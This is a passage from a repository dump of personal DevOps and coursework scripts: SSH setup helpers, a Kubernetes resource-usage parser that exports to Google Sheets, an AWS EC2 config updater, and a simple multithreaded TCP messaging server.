"max_line_length": 69, "num_lines": 13, "path": "/bash/myenv/start-remotely.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nread -p \"Enter server and user (example: root@ecsc00a00a46.epam.com): \" server\nread -p \"Specify custom port? 
(default: 22):\" port\nread -p \"Enter path of downloading (/tmp/): \" path\necho \"Path : ${path:=/tmp}\"\necho \"Port : ${port:=22}\"\necho \"Copying Vm-env files in ${path} on ${server}\" \n\nscp -r -P ${port} ~/Workspace/Scripts/myenv/Vm-env ${server}:${path}/\n\necho \"Executing script on remoute server: ${server}\"\nssh ${server} -p ${port} \"$path/Vm-env/start.sh ${path}\"\n\n" }, { "alpha_fraction": 0.7764350175857544, "alphanum_fraction": 0.7854984998703003, "avg_line_length": 65.4000015258789, "blob_id": "bec992b8564c23b527299e4ba2301f2ce1ff5f47", "content_id": "87ec951bd88d08038df9bb77e52e51b9760c397f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 331, "license_type": "no_license", "max_line_length": 229, "num_lines": 5, "path": "/EC2_parcer/README.md", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "Updates [config-cluster.yaml](https://github.com/Infoblox-CTO/csp.host-app.service/blob/develop/deploy/vanilla_v2/QA0/config-cluster.yaml) with relevant Public IP for Jumphosts and Internal IP for core nodes on hostapp clusters \n\nRequirements:\n - AWS cli installed and configured (and your account has access to ec2)\n - pipenv" }, { "alpha_fraction": 0.6362007260322571, "alphanum_fraction": 0.643369197845459, "avg_line_length": 20.461538314819336, "blob_id": "7486af90df195d1a6fa0479045a46eaa3ba1001c", "content_id": "930a0b665e82b8422a71ec6195c138dfc41b5001", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 558, "license_type": "no_license", "max_line_length": 64, "num_lines": 26, "path": "/bash/add-ssh-key.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nread -p \"Enter path of key (/Users/dart/.ssh/id_rsa.pub): \" KEY\necho \"Path : ${KEY:=/Users/dart/.ssh/id_rsa.pub}\"\n\nif [ -f $KEY ]; then\n\t\techo \"id_rsa.pub exists!\"\nelse\n\techo \"Can't find key, generating new key!\"\n\tssh-keygen -t rsa\n\tif [-f $KEY]; then\n\t\techo \"Key generated!\"\n\telse\n\t\techo \"Keys not generated, error!\"\n\t\texit\n\tfi\nfi\n\nread -p \"Enter server and user (example: root@ecsc00a00a46.epam.com): \" server\necho \"serv: ${server}\"\n\n#read -p \"Enter server port (example: 22): \" serverport\n#echo \"Path : ${serverport:=22}\"\n\nssh-copy-id $server \n#-p $serverport\n" }, { "alpha_fraction": 0.5361188054084778, "alphanum_fraction": 0.5408298969268799, "avg_line_length": 33.90863800048828, "blob_id": "2152f4199267a9fb5429fc0096b063aac89603e3", "content_id": "fe1178aaf3a163fe08739f70bb3e74313fc6ef55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21014, "license_type": "no_license", "max_line_length": 151, "num_lines": 602, "path": "/google_sheets_parcer/resources_parser.py", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "import os\nimport git\nimport yaml\nimport csv\nimport re\nimport time\nimport gspread\nfrom pydrive.auth import ServiceAccountCredentials\n# import pdb; pdb.set_trace()\n\n\nclass Env:\n\n def __init__(self, name):\n self.name = name\n self.projects = []\n self.sum_metrics = None\n\n def get_project(self, name):\n for prj in self.projects:\n if prj.name == name:\n return prj\n prj = Project(name)\n self.projects.append(prj)\n return prj\n\n def calc(self):\n sum_min_CPU = 0\n sum_max_CPU = 0\n sum_min_MEM = 0\n sum_max_MEM = 0\n\n int_sum_min_CPU = 0\n int_sum_max_CPU = 0\n int_sum_min_MEM = 0\n int_sum_max_MEM = 
0\n\n for prj in self.projects:\n sum_min_CPU += prj.sum_metrics.min_CPU\n sum_max_CPU += prj.sum_metrics.max_CPU\n sum_min_MEM += prj.sum_metrics.min_MEM\n sum_max_MEM += prj.sum_metrics.max_MEM\n self.sum_metrics = Calculator(sum_min_CPU, sum_max_CPU, sum_min_MEM, sum_max_MEM)\n\n for prj in self.projects:\n int_sum_min_CPU += prj.sum_metrics_int.min_CPU\n int_sum_max_CPU += prj.sum_metrics_int.max_CPU\n int_sum_min_MEM += prj.sum_metrics_int.min_MEM\n int_sum_max_MEM += prj.sum_metrics_int.max_MEM\n self.sum_metrics_int = Calculator(int_sum_min_CPU, int_sum_max_CPU, int_sum_min_MEM, int_sum_max_MEM)\n\n def __repr__(self):\n return \"Env: {0}\\n Projects: {1}\".format(self.name, self.projects)\n\n\nclass Project:\n\n def __init__(self, name):\n self.name = name\n self.services = []\n self.sum_metrics = None\n\n def get_service(self, name):\n for srv in self.services:\n if srv.name == name:\n return srv\n srv = Service(name)\n self.services.append(srv)\n return srv\n\n def calc(self):\n sum_min_CPU = 0\n sum_max_CPU = 0\n sum_min_MEM = 0\n sum_max_MEM = 0\n\n int_sum_min_CPU = 0\n int_sum_max_CPU = 0\n int_sum_min_MEM = 0\n int_sum_max_MEM = 0\n\n for srv in self.services:\n sum_min_CPU += srv.sum_metrics.min_CPU\n sum_max_CPU += srv.sum_metrics.max_CPU\n sum_min_MEM += srv.sum_metrics.min_MEM\n sum_max_MEM += srv.sum_metrics.max_MEM\n self.sum_metrics = Calculator(sum_min_CPU, sum_max_CPU, sum_min_MEM, sum_max_MEM)\n\n for srv in self.services:\n int_sum_min_CPU += srv.sum_metrics_int.min_CPU\n int_sum_max_CPU += srv.sum_metrics_int.max_CPU\n int_sum_min_MEM += srv.sum_metrics_int.min_MEM\n int_sum_max_MEM += srv.sum_metrics_int.max_MEM\n self.sum_metrics_int = Calculator(int_sum_min_CPU, int_sum_max_CPU, int_sum_min_MEM, int_sum_max_MEM)\n\n def __repr__(self):\n return \"\\nProject: {0}\\nServices: {1}\".format(self.name, self.services)\n\n\nclass Service:\n\n def __init__(self, name):\n self.name = name\n self.pods = []\n self.sum_metrics = None\n self.sum_metrics_int = None\n\n def get_pod(self, name):\n for pod in self.pods:\n if pod.name == name:\n return pod\n pod = Pod(name)\n self.pods.append(pod)\n return pod\n\n def calc(self):\n sum_min_CPU = 0\n sum_max_CPU = 0\n sum_min_MEM = 0\n sum_max_MEM = 0\n\n int_sum_min_CPU = 0\n int_sum_max_CPU = 0\n int_sum_min_MEM = 0\n int_sum_max_MEM = 0\n\n for pod in self.pods:\n sum_min_CPU += pod.sum_metrics.min_CPU\n sum_max_CPU += pod.sum_metrics.max_CPU\n sum_min_MEM += pod.sum_metrics.min_MEM\n sum_max_MEM += pod.sum_metrics.max_MEM\n\n for pod in self.pods:\n int_sum_min_CPU += pod.sum_metrics.min_CPU / pod.replicas\n int_sum_max_CPU += pod.sum_metrics.max_CPU / pod.replicas\n int_sum_min_MEM += pod.sum_metrics.min_MEM / pod.replicas\n int_sum_max_MEM += pod.sum_metrics.max_MEM / pod.replicas\n\n self.sum_metrics = Calculator(sum_min_CPU, sum_max_CPU, sum_min_MEM, sum_max_MEM)\n self.sum_metrics_int = Calculator(int_sum_min_CPU, int_sum_max_CPU, int_sum_min_MEM, int_sum_max_MEM)\n\n def __repr__(self):\n return \"\\nService: {0}\\nPods: {1}\".format(self.name, self.pods)\n\n\nclass Pod:\n\n def __init__(self, name):\n self.name = name\n self.containers = []\n self.replicas = None\n self.sum_metrics = None\n\n def add_container(self, cnt):\n # for cnt in self.containers:\n # if cnt.name == name:\n # return cnt\n self.containers.append(cnt)\n return cnt\n\n def calc(self):\n sum_min_CPU = 0\n sum_max_CPU = 0\n sum_min_MEM = 0\n sum_max_MEM = 0\n\n for cnt in self.containers:\n sum_min_CPU += self.none_checker(cnt.metrics.min_CPU) * 
self.replicas\n sum_max_CPU += self.none_checker(cnt.metrics.max_CPU) * self.replicas\n sum_min_MEM += self.none_checker(cnt.metrics.min_MEM) * self.replicas\n sum_max_MEM += self.none_checker(cnt.metrics.max_MEM) * self.replicas\n self.sum_metrics = Calculator(sum_min_CPU, sum_max_CPU, sum_min_MEM, sum_max_MEM)\n\n @staticmethod\n def none_checker(mtr):\n if mtr is None:\n return 0\n else:\n return mtr\n\n def __repr__(self):\n return \"\\nPod: {0} |Replicas: {2}\\nContainers: {1}\".format(self.name, self.containers, self.replicas)\n\n\nclass Container:\n\n def __init__(self, name, metrics):\n self.name = name\n self.metrics = metrics\n\n def __repr__(self):\n return \"\\nContainer: {0}\\n \\tMetrics: {1}\".format(self.name, self.metrics)\n\n\nclass Metrics:\n\n def __init__(self):\n self.min_CPU = None\n self.max_CPU = None\n self.min_MEM = None\n self.max_MEM = None\n\n def __repr__(self):\n return \"\\n\\t\\tmin_CPU: {0} \\n\\t\\tmax_CPU: {1} \\n\\t\\tmin_MEM: {2} \\n\\t\\tmax_MEM: {3}\".format(self.min_CPU, self.max_CPU,\n self.min_MEM, self.max_MEM)\n\n\nclass Calculator:\n\n def __init__(self, min_CPU, max_CPU, min_MEM, max_MEM):\n self.min_CPU = min_CPU\n self.max_CPU = max_CPU\n self.min_MEM = min_MEM\n self.max_MEM = max_MEM\n\n\nclass Summarizer:\n\n def __init__(self, envs):\n self.envs = envs\n\n def sum(self):\n for env in self.envs:\n for prj in env.projects:\n for srv in prj.services:\n for pod in srv.pods:\n pod.calc()\n srv.calc()\n prj.calc()\n env.calc()\n\n\nclass Repository:\n\n def __init__(self, git_url):\n\n self.local_path = os.getcwd() + '/repo'\n self.git_url = git_url\n\n print(\"Cloning repo in {0}\".format(self.local_path))\n\n try:\n git.Repo.clone_from(self.git_url, self.local_path)\n except git.exc.GitCommandError as err:\n print(err)\n\n self.repo = git.Repo(self.local_path)\n\n print(\"Active branch: {0}\".format(self.repo.active_branch))\n print(\"- : {0}\".format(self.repo))\n\n\nclass Parser:\n \"\"\"\n :param repo, folders\n :returns nested dict with metrics\n \"\"\"\n\n def __init__(self, repo, to_check_folders, envs):\n self.repo_path = repo # Local system path to repository\n self.required_files_path = [] # Array with all files from folders to check\n self.to_check_folders = to_check_folders\n self.envs = envs\n # todo git webhooks after commit\n\n def searcher(self, path):\n \"\"\"\n function recursivelly searches all files from the given file path\n\n :param path: folder path\n :return: all files full path, from given folder\n \"\"\"\n\n for file in os.listdir(path):\n file_path = str(path + '/' + file)\n\n if os.path.isdir(file_path):\n self.searcher(file_path)\n else:\n self.required_files_path.append(file_path)\n\n return self.required_files_path\n\n def search_required_folders(self, folders):\n \"\"\"\n :param folders: folders required to check\n :return: all files full paths\n \"\"\"\n\n for folder in folders:\n folder = self.repo_path + \"/\" + folder\n try:\n for file in os.listdir(folder):\n file_path = str(folder + '/' + file)\n if os.path.isdir(file_path):\n self.searcher(file_path)\n else:\n self.required_files_path.append(file_path)\n except FileNotFoundError as err:\n print(\"Directory not found: {0}\".format(err))\n return self.required_files_path\n\n def parse(self):\n\n required_files = self.search_required_folders(self.to_check_folders)\n self.fill_the_structure(required_files) # Getting files from to_check_folders to parse\n\n def fill_the_structure(self, files):\n \"\"\"\n :param files to parse\n :return: list of dicts for 
each env\n \"\"\"\n files_parsed = 0\n files_failed_to_parse = 0\n for file in files:\n data = self.check_file_kind(file)\n if data:\n print(\"Checking file: {0}\".format(file))\n # print(\"Data: {0}\".format(data))\n self.parse_yaml(file, data)\n files_parsed+=1\n print(\"Files parsed: {0}\".format(files_parsed))\n return self.envs\n\n def check_file_kind(self, file):\n if file.lower().endswith('.yaml'):\n with open(file, 'r') as stream:\n try:\n for data in yaml.load_all(stream):\n if data:\n if data.get('kind', None) == 'Deployment':\n return data\n else:\n return False\n except AttributeError as err:\n print(\"=> Error parsing yaml file: {0} \\n Error: {1}\".format(file, err))\n return False\n\n except yaml.YAMLError as err:\n print(\"=> Error parsing yaml file: {0} \\n Error: {1}\".format(file, err))\n return False\n else:\n return False\n\n def get_env(self, name):\n for env in self.envs:\n if env.name == name:\n return env\n env = Env(name)\n self.envs.append(env)\n return env\n\n def parse_yaml(self, file, data):\n env = self.get_env(file.split('/')[-2])\n # prj = env.get_project(file[(file.index('/deployment/') + len('/deployment/')):file.index(\"/\" + env.name)])\n prj = env.get_project(file.split('/')[file.split('/').index('deployment') + 1])\n\n if data.get('metadata', {}).get('name', None):\n srv = prj.get_service(data['metadata']['name'])\n pod_replicas = data.get('spec', {}).get('replicas', None)\n if data.get('spec', {}).get('template', {}).get('metadata', {}).get('labels', {}).get('app', None):\n pod = srv.get_pod(data['spec']['template']['metadata']['labels']['app'])\n pod.replicas = pod_replicas\n else:\n pod = srv.get_pod(srv.name)\n pod.replicas = pod_replicas\n if data.get('spec', {}).get('template', {}).get('spec', {}).get('containers', None):\n for container in data['spec']['template']['spec']['containers']:\n metrics = Metrics()\n if container.get('resources', None):\n if container['resources'].get('requests', None):\n metrics.min_CPU = container['resources']['requests'].get('cpu', 0)\n metrics.min_MEM = container['resources']['requests'].get('memory', 0)\n if container['resources'].get('limits', None):\n metrics.max_CPU = container['resources']['limits'].get('cpu', 0)\n metrics.max_MEM = container['resources']['limits'].get('memory', 0)\n\n metrics.min_CPU = self.metric_recalculation(metrics.min_CPU)\n metrics.max_CPU = self.metric_recalculation(metrics.max_CPU)\n metrics.max_MEM = self.metric_recalculation(metrics.max_MEM)\n metrics.min_MEM = self.metric_recalculation(metrics.min_MEM)\n\n cnt = Container(container.get('name', None), metrics)\n pod.add_container(cnt)\n\n def metric_recalculation(self, metric):\n if type(metric) is int:\n return metric\n if type(metric) is str:\n if 'm' in metric:\n return int(re.findall('\\d+', str(metric))[0]) / 1000\n elif 'Gi' in metric:\n return int(re.findall('\\d+', str(metric))[0]) * 1000\n elif 'Mi' in metric:\n return int(re.findall('\\d+', str(metric))[0])\n if type(metric) is None:\n return int(0)\n\n\nclass Printer:\n\n def __init__(self, envs):\n self.envs = envs\n\n def print(self):\n for env in envs:\n print(\"Env: \" + env.name)\n for prj in env.projects:\n print(\"- Project: \" + prj.name)\n for srv in prj.services:\n print(\" - Service: \" + srv.name)\n for pod in srv.pods:\n print(\" - Pod: \" + pod.name)\n print(\" Replicas: {0}\".format(pod.replicas))\n for cnt in pod.containers:\n print(\" - Container: {0}\".format(cnt.name))\n print(\" {0}\".format(cnt.metrics))\n\n\nclass CSVPrinter(Printer):\n\n def 
__init__(self, envs):\n self.headers = [\"Project\", \"Service\", \"Pod\", \"Summary\", \"Replicas\", \"Container\", \"min_CPU\", \"max_CPU\",\n \"min_MEM\", \"max_MEM\"]\n super(CSVPrinter, self).__init__(envs)\n\n def write_row(self, *arg):\n self.csv_env.append([*arg])\n\n def print_to_files(self):\n\n csv_files_dir = os.getcwd() + '/envs/'\n print(\"Printing to files to {0}\".format(csv_files_dir))\n if not os.path.exists(csv_files_dir):\n os.makedirs(csv_files_dir)\n\n files = []\n env_names = []\n for env in self.envs:\n with open(csv_files_dir + env.name, \"w\") as file:\n writer = csv.DictWriter(file, self.headers)\n writer.writeheader()\n for row in self.print_env(env):\n writer.writerow(dict(zip(self.headers, row)))\n files.append(csv_files_dir + env.name)\n env_names.append(env.name)\n return env_names, files\n\n def print_env(self, env):\n self.csv_env = []\n for prj in env.projects:\n for srv in prj.services:\n for pod in srv.pods:\n for cnt in pod.containers:\n self.write_row(prj.name, srv.name, pod.name, None, None, cnt.name,\n cnt.metrics.min_CPU, cnt.metrics.max_CPU, cnt.metrics.min_MEM, cnt.metrics.max_MEM)\n\n self.write_row(prj.name, srv.name, pod.name, \"by pod\", pod.replicas, None,\n pod.sum_metrics.min_CPU, pod.sum_metrics.max_CPU, pod.sum_metrics.min_MEM, pod.sum_metrics.max_MEM)\n self.write_row(None, None, None, None, None, None, None, None, None, None)\n\n self.write_row(prj.name, srv.name, None, \"by service\", None, None,\n srv.sum_metrics.min_CPU, srv.sum_metrics.max_CPU, srv.sum_metrics.min_MEM, srv.sum_metrics.max_MEM)\n self.write_row(prj.name, srv.name, None, \"by service(integration)\", None, None,\n srv.sum_metrics_int.min_CPU, srv.sum_metrics_int.max_CPU, srv.sum_metrics_int.min_MEM, srv.sum_metrics_int.max_MEM)\n\n self.write_row(None, None, None, None, None, None, None, None, None, None)\n self.write_row(prj.name, None, None, \"by project\", None, None,\n prj.sum_metrics.min_CPU, prj.sum_metrics.max_CPU, prj.sum_metrics.min_MEM, prj.sum_metrics.max_MEM)\n self.write_row(prj.name, None, None, \"by project(integration)\", None, None,\n prj.sum_metrics_int.min_CPU, prj.sum_metrics_int.max_CPU, prj.sum_metrics_int.min_MEM, prj.sum_metrics_int.max_MEM)\n self.write_row(None, None, None, None, None, None, None, None, None, None)\n\n self.write_row(None, None, None, None, None, None, None, None, None, None)\n self.write_row(None, None, None, \"Total\", None, None,\n env.sum_metrics.min_CPU, env.sum_metrics.max_CPU, env.sum_metrics.min_MEM, env.sum_metrics.max_MEM)\n self.write_row(None, None, None, \"Total(integration)\", None, None,\n env.sum_metrics_int.min_CPU, env.sum_metrics_int.max_CPU, env.sum_metrics_int.min_MEM, env.sum_metrics_int.max_MEM)\n\n return self.csv_env\n\n def print(self):\n for env in envs:\n return env.name, self.print_env(env)\n\n def print_by_env(self, env):\n return env.name, self.print_env(env)\n\n\nclass CSVImporter:\n def __init__(self, credentials):\n\n scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']\n self.credentials = ServiceAccountCredentials.from_json_keyfile_name(credentials, scope)\n self.gc = gspread.authorize(self.credentials)\n\n def create_sheet(self, sh_name, mail):\n \n self.sh = self.gc.create(sh_name)\n self.sh.share('mail', perm_type='user', role='writer')\n return self.sh\n\n def calculate_env_size(self, metrics):\n rows = len(metrics)\n cols = len(metrics[0])\n print(\"rows: {0} \\ncolumns: {1}\".format(rows, cols))\n return rows, cols\n\n def import_env(self, 
sheet_key, env_name, metrics, mail):\n\n print(\"Updating env: {0}\".format(env_name))\n\n try:\n sheet = self.gc.open_by_key(sheet_key)\n print(\"Opening sheet: {0}\".format(sheet.title))\n except Exception:\n print(\"Creating new sheet: {0}\".format(sheet.title))\n sheet = self.create_sheet(sheet_key, mail)\n\n rows, cols = self.calculate_env_size(metrics)\n\n try:\n sheet.del_worksheet(sheet.worksheet(env_name))\n except gspread.exceptions.WorksheetNotFound:\n print(\"Creating new worksheet: {0}\".format(env_name))\n\n wsh = sheet.add_worksheet(title=env_name, rows=rows, cols=cols)\n\n self.update_by_cell(wsh, metrics)\n\n def update_by_cell(self, wsh, metrics):\n\n if self.credentials.access_token_expired:\n print(\"Refreshing token\")\n self.gc.login()\n\n for row_i, row in enumerate(metrics):\n print(row_i, row)\n for col_i, cell in enumerate(row):\n print(row_i + 1, col_i + 1, cell)\n wsh.update_cell(row_i + 1, col_i + 1, cell)\n time.sleep(1)\n\n def update_wsh(self, wsh, metrics):\n\n cell_list = []\n for row_i, row in enumerate(metrics):\n for col_i, value in enumerate(row):\n print(row_i + 1, col_i + 1, value)\n cellToUpdate = wsh.cell(row_i + 1, col_i + 1)\n cellToUpdate.value = value\n cell_list.append(cellToUpdate)\n\n # print(\"cell_list:\")\n # print(cell_list)\n wsh.update_cells(cell_list)\n\n\nif __name__ == '__main__':\n\n # todo argparse\n\n # Execution parameters\n repo_url = 'git@github.com:amaslakou/saas-app-deployment.git'\n to_check_folders = [\"folder1\", \"folder2\", \"folder3\"]\n google_sheet_key = '1b34X*****************'\n credentials_importer = os.getcwd() + '/service_account.json'\n mail = 'YOUR_MAIL_ADDR@gmail.com'\n\n # Downloading repository\n repo = Repository(repo_url)\n repository = repo.local_path\n\n # Parse required folders, create envs structure\n envs = []\n parser = Parser(repo.local_path, to_check_folders, envs)\n parser.parse()\n\n if not envs:\n print(\"No metrics found\")\n exit()\n else:\n printer = Printer(envs)\n printer.print()\n\n # Add sum values in envs structure\n summarizer = Summarizer(envs)\n summarizer.sum()\n\n csv_printer = CSVPrinter(envs)\n\n # Prints CSV to local files\n csv_printer.print_to_files()\n\n # Authenticate in Google\n print(credentials_importer)\n\n # Writing envs to Google Sheets\n for env in envs:\n env_name, env_metrics = csv_printer.print_by_env(env)\n csv_importer = CSVImporter(credentials_importer)\n csv_importer.import_env(google_sheet_key, env_name, env_metrics, mail)" }, { "alpha_fraction": 0.7209302186965942, "alphanum_fraction": 0.7255814075469971, "avg_line_length": 20.299999237060547, "blob_id": "9907b9a698eb30be5e4ab637f1aeda32ed5ccb7d", "content_id": "776e86f22b79ec211dfd7a7e2e75b0be74361403", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 215, "license_type": "no_license", "max_line_length": 69, "num_lines": 10, "path": "/tcp_server/Dockerfile", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "FROM python:3\n\nWORKDIR /Users/dart/Workspace/Virtualization/Docker/Python/tcp_server\n\nCOPY requirements.txt ./\nRUN pip install --no-cache-dir -r requirements.txt\n\nCOPY . 
.\n\nCMD [ \"python\", \"./new_TCP_server.py\" ]\n\n\n" }, { "alpha_fraction": 0.6499999761581421, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 13.75, "blob_id": "86cd90843fd7ee791258fd2ece2e15e1101fa73a", "content_id": "86d3b585482c1c4377790c5530a585637694f442", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 60, "license_type": "no_license", "max_line_length": 26, "num_lines": 4, "path": "/bash/myenv/Vm-env/test.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"Dirname check: $PWD\"\n. user-env/echo.sh \n" }, { "alpha_fraction": 0.5316159129142761, "alphanum_fraction": 0.5403448939323425, "avg_line_length": 34.05223846435547, "blob_id": "fdca3ce3165b6bce1a91cb33e035c480035ccb18", "content_id": "adfa93c84537384fd14883bbbeec60cb0856c23b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4697, "license_type": "no_license", "max_line_length": 87, "num_lines": 134, "path": "/EC2_parcer/cluster-ip-discovery/updater.py", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# install aws-cli and enter credentials\n\nimport boto3\nimport yaml\nfrom collections import defaultdict\n\n\nclass AWS():\n\n def __init__(self):\n self.ec2 = boto3.resource('ec2')\n self.ec2info = self.get_ec2info()\n\n def get_ec2info(self):\n ec2info = defaultdict()\n running_ec2_instances = self.ec2.instances.filter(\n Filters=[{\n 'Name': 'instance-state-name',\n 'Values': ['running']\n }])\n for instance in running_ec2_instances:\n for tag in instance.tags:\n if 'Name' in tag['Key']:\n name = tag['Value']\n ec2info[instance.id] = {\n \"Name\": name,\n \"Type\": instance.instance_type,\n \"State\": instance.state[\"Name\"],\n \"Public-IP\": instance.public_ip_address,\n \"Internal-IP\": instance.private_ip_address}\n return ec2info\n\n # def print_all_instances(self):\n # print(\"=> Getting all ec2 instances\")\n # for instance_id, instance in self.ec2info.items():\n # print(instance_id)\n # for k, v in instance.items():\n # print(\"{0}: {1}\".format(k, v))\n #\n # def print_jumphosts(self):\n # print(\"=> Searching for ec2 instances with public IP\")\n # for instance_id, instance in self.ec2info.items():\n # if not instance.get(\"Public-IP\") == None:\n # for k, v in instance.items():\n # print(\"{0}: {1}\".format(k, v))\n\n def find_cluster_instances(self, names):\n cluster_info = defaultdict()\n for name in names:\n print(\"=> Searching for : {}\".format(name))\n for instance_id, instance in self.ec2info.items():\n if instance[\"Name\"] == name:\n cluster_info[instance_id] = {\n \"Name\": name,\n \"Internal-IP\": instance[\"Internal-IP\"],\n \"Public-IP\": instance[\"Public-IP\"]}\n return cluster_info\n\n\nclass Cluster:\n\n def __init__(self, file):\n self.file = file\n self.config = self.parse_config()\n self.name = self.config[\"SSH\"][\"jump_host\"][\"name\"]\n self.search_instances = self.get_instances_names_for_cluster()\n self.info = defaultdict()\n\n def get_instances_names_for_cluster(self):\n if self.name == 'qa-0':\n search_instanses = ['QA-0-Core-SDP-QA', 'QA-0-Core-k8s-NGP-QA']\n elif self.name == 'qa-1':\n search_instanses = ['QA-1-Core-SDP-QA', 'QA-1-Core-k8s-NGP-QA']\n elif self.name == 'qa-2':\n search_instanses = ['QA-2-Core-SDP-QA', 'QA-2-Core-k8s-NGP-QA']\n elif self.name == 'qa-4':\n search_instanses = ['QA-4-Core-SDP-Dev', 'QA-4-Core-k8s-NGP-Dev']\n return search_instanses\n\n def 
parse_config(self):\n with open(self.file, 'r') as stream:\n try:\n yaml_file = yaml.safe_load(stream)\n return yaml_file\n except yaml.YAMLError as exc:\n print(exc)\n return None\n\n def update_config(self):\n print(\"=> Updating {} config\".format(self.name))\n core_internal_ip = []\n jumphost_public_ip = self.config[\"SSH\"][\"jump_host\"][\"ip\"]\n\n for cluster_name, cluster_info in self.info.items():\n if cluster_info[\"Public-IP\"]:\n jumphost_public_ip = cluster_info[\"Public-IP\"]\n else:\n core_internal_ip.append(cluster_info[\"Internal-IP\"])\n\n if self.config[\"SSH\"][\"jump_host\"][\"ip\"] != jumphost_public_ip:\n print(\"=> Changing Jumphost IP to {}\".format(jumphost_public_ip))\n self.config[\"SSH\"][\"jump_host\"][\"ip\"] = jumphost_public_ip\n\n if core_internal_ip != self.config[\"SSH\"][\"core\"][\"ips\"]:\n print(\"=> Changing Core IPs to:\")\n print(core_internal_ip)\n self.config[\"SSH\"][\"core\"][\"ips\"] = core_internal_ip\n\n stream = open(self.file, 'w')\n yaml.safe_dump(self.config, stream, default_flow_style=False)\n\n def print_config(self, *args):\n print(self.name)\n print(self.info)\n\n def print_info(self):\n for cluster_name, cluster_info in self.info.items():\n for k, v in cluster_info.items():\n print(\"{0}: {1}\".format(k, v))\n\n\ndef main():\n\n # Change Cluster.get_instances_names_for_cluster if instances names in AWS changed.\n\n aws = AWS()\n cluster = Cluster('config-cluster.yaml')\n cluster.info = aws.find_cluster_instances(cluster.search_instances)\n cluster.update_config()\n\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6333333253860474, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 19, "blob_id": "411486a6a55a83f9ebde0f6488bcd157c51e8cda", "content_id": "131e4f91deeca4e725000156a644332b036600d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 120, "license_type": "no_license", "max_line_length": 40, "num_lines": 6, "path": "/bash/myenv/Vm-env/user-env/bash.sh", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\necho \"Source path:\" $1\necho \"==> Copying bashrc\"\ncp ${1}/Vm-env/configs/.bashrc ~/.bashrc\nsource ~/.bashrc\n" }, { "alpha_fraction": 0.6203252077102661, "alphanum_fraction": 0.624119222164154, "avg_line_length": 32.85321044921875, "blob_id": "11756ddbfb598090b568d381ff8475607f9ce16f", "content_id": "8d71dd1332c82782154e1c627dba02aab2810c24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4269, "license_type": "no_license", "max_line_length": 267, "num_lines": 109, "path": "/tcp_server/tcp_server/new_TCP_server.py", "repo_name": "amaslak0v/scripts", "src_encoding": "UTF-8", "text": "import socket\nimport socketserver\nimport json\nfrom ast import literal_eval\n\n\"\"\" \nПервое приложение (сервер)\nСоздать многопоточный TCP-сервер со следующим функционалом: \n– фиксировать все попытки входящих соединений со стороны клиентов\n– сервер должен идентифицировать клиента по его ip-адресу и сопоставлять с ним имя (к клиенту в дальнейшем можно обращаться по имени или по ip-адресу)\n– организовать постоянный приём и отсылку сообщений от клиентов (каждый клиент должен иметь возможность отправить любому другому присоединенному к серверу клиенту сообщение), сообщения оформляются как команды с помощью JSON, формат команд согласовать с преподавателем\n– по требованию клиента сервер должен выдавать список всех присоединенных к нему клиентов (список оформляется 
с помощью JSON)\n\"\"\"\n\n\nclass ClientBase:\n\n def __init__(self):\n self.base = {}\n self.clients = []\n\n def add_client(self, ip, port):\n cl = self.get_client(ip)\n if cl is None:\n name = 'user_{}'.format(len(self.clients) + 1)\n new_client = Client(name, ip, port)\n self.clients.append(new_client)\n return new_client\n else:\n return cl\n\n def get_users_json(self):\n for cl in self.clients:\n self.base[cl.name] = cl.ip\n return json.dumps(self.base, indent=4, sort_keys=True)\n\n def get_client(self, param):\n for cl in self.clients:\n if cl.ip == param:\n return cl\n if cl.name == param:\n return cl\n return None\n\n\nclass Client:\n\n def __init__(self, name, ip, port):\n self.ip = ip\n self.name = name\n self.port = port\n\n def __repr__(self):\n return \"Name: {}\\nIP: {}\\nPort: {}\".format(self.name, self.ip, self.port)\n\n\nclass MyTCPHandler(socketserver.BaseRequestHandler):\n\n def __init__(self, request, client_address, server):\n\n self.clients_base = ClientBase()\n super().__init__(request, client_address, server)\n\n def handle(self):\n data = self.request.recv(1024).strip()\n data_dict = literal_eval(data.decode())\n\n ip, port = self.client_address\n client = self.clients_base.add_client(ip, port)\n print(\"\\nConnected -> User: {}, IP: {}\".format(client.name, client.ip))\n print('Data received: {}'.format(data_dict))\n\n response = self.process_request(data_dict)\n if self.clients_base.get_client(data_dict['send_to']):\n self.send_to_other_client(client, response)\n\n self.request.sendall(response)\n\n def process_request(self, data):\n if data['command'] == 'get_users':\n response = str(self.get_users_json())\n else:\n response = data['command']\n return bytes(response + \"\\n\", \"utf-8\")\n\n def send_to_other_client(self, client, response):\n try:\n print(\"Sending {} to {}\".format(response, client))\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n sock.connect((client.ip, client.port))\n sock.sendall(bytes(response, \"utf-8\"))\n except ConnectionRefusedError as err:\n print('Connection refused by server. {}'.format(err))\n\n def get_users_json(self):\n print(self.clients_base.get_users_json())\n return self.clients_base.get_users_json()\n\n\nif __name__ == '__main__':\n\n HOST = '0.0.0.0'\n PORT = 80\n\n with 